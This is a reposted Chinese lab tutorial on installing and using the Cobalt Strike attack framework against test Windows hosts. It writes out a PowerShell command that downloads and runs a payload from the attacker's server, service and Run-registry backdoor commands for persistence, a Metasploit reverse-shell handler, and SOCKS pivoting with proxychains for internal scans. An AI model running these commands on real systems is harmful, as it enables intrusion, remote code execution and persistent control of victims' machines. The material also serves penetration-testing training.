ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

【工具】Cobalt Strile安装及简单使用

2021-12-31 10:03:20  阅读:171  来源: 互联网

标签:exe Strile 端口 192.168 Cobalt 选择 木马 10.10 安装


简介

​ Cobalt Strike 一款以Metasploit为基础的GUI框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell木马生成等。

​ Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,windows exe 木马生成,windows dll 木马生成,java 木马生成,office 宏病毒生成,木马捆绑。钓鱼攻击包括:站点克隆,目标信息获取,java 执行,浏览器自动攻击等等强大的功能!

安装

环境

服务端:kali(192.168.1.28)

客户端:Win10

服务端

将文件上传到kali中
在这里插入图片描述

进入cs4.0中文目录输入命令

./teamserver [kali-ip] [密码]

在这里插入图片描述

客户端

进入文件夹双击客户端启动脚本
在这里插入图片描述

**主机:**为我们刚刚建立服务器的IP地址
**端口:**端口不用管 默认就可以
**用户名:**随意都行 (默认就可以)
**密码:**输入刚才服务端密码

在这里插入图片描述

检查指纹
在这里插入图片描述

成功连接 在这里插入图片描述

软件说明

每个按钮的意思 在这里插入图片描述

演示实例

环境

攻击机:kali(192.168.1.28)

边缘主机:Win7(192.168.1.8、10.10.10.2)

内网主机:Winxp(10.10.10.3)

实例

创建监听 在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

创建木马
在这里插入图片描述

选择监听器
在这里插入图片描述

选择木马保存路径
在这里插入图片描述
在这里插入图片描述

开启web服务
在这里插入图片描述

选择刚刚生成的木马文件
在这里插入图片描述
在这里插入图片描述

在靶机运行木马
在这里插入图片描述

靶机成功上线
在这里插入图片描述

在这里插入图片描述

联动MSF(shell)

MSF开启监听

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.183.147
set lport 4444
run

在这里插入图片描述

创建两个监听器,一个使用windows/beacon_http/reverse_http来监听肉鸡,另一个使用windows/foreign/reverse_http来将获取到的控制权传给msf(注意:这里的端口要与msf监听的端口一致)

在这里插入图片描述
在这里插入图片描述

当目标上线后,选择目标点击鼠标右键选择增加会话
在这里插入图片描述

在这里插入图片描述

获取到的会话不稳定
在这里插入图片描述

提权

选中目标点击鼠标右键选择执行->提权
在这里插入图片描述

选择监听器
在这里插入图片描述

提权成功
在这里插入图片描述

权限维持

点击攻击->钓鱼攻击->script web delivery
在这里插入图片描述

选择监听器
在这里插入图片描述

点击开始生成如下命令

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.28:80/a'))"

在靶机上执行上面生成的命令会上线具有普通用户权限的主机
在这里插入图片描述

提权之后打开beacon shell并执行命令

shell sc create "name" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.183.28:80/a'))\""

在这里插入图片描述

在靶机上查看服务
在这里插入图片描述

将服务改为自动

shell sc config "name" start= auto

在这里插入图片描述
在这里插入图片描述

当靶机重启后依旧可以拿到权限

注册表后门

点击攻击->生成后门->windows executable

在这里插入图片描述

设置监听
在这里插入图片描述

保存到桌面
在这里插入图片描述

上传木马文件,选择会话点击鼠标右键选择目标->文件管理
在这里插入图片描述

选择木马文件进行上传
在这里插入图片描述

设置为注册表后门

shell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "keyname" /t REG_SZ /d "C:\Users\aa\Desktop\artifact.exe" /f

在这里插入图片描述
在这里插入图片描述

也可以选择将exe设置为服务后门

shell sc create "exe" binpath= "C:\Users\abc\Desktop\artifact.exe"

在这里插入图片描述
在这里插入图片描述

设置Socks代理

开启socks4a代理,通过代理进行内网渗透
开启socks,可以通过命令,也可以通过右键选择中转->SOCKS Server
在这里插入图片描述

socks 12345

在这里插入图片描述

编辑proxychains.conf ,在文件末尾添加socks4代理服务器

vi /etc/proxychains.conf

在这里插入图片描述

使用proxychains代理扫描内网主机,socks4的代理,只能使用tcp协议,所以nmap使用的时候要使用-sT选择使用tcp协议,要使用-Pn不使用ICMP的ping确认主机存活

proxychains nmap -sT -Pn 10.10.10.0/24

在这里插入图片描述

可以判断出是存在主机10.10.10.3的,对内网主机10.10.10.3进行端口扫描

proxychains nmap -sT -Pn 10.10.10.3

在这里插入图片描述

联动MSF(扫描)

点击视图->代理信息->选择Socks4a Proxy,点击Tunnel
在这里插入图片描述

在这里插入图片描述

启动MSF输入方框中的内容

setg Proxies socks4:192.168.1.28:12345

在这里插入图片描述

扫描
在这里插入图片描述

标签:exe,Strile,端口,192.168,Cobalt,选择,木马,10.10,安装
来源: https://blog.csdn.net/qq_44276741/article/details/122249607

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有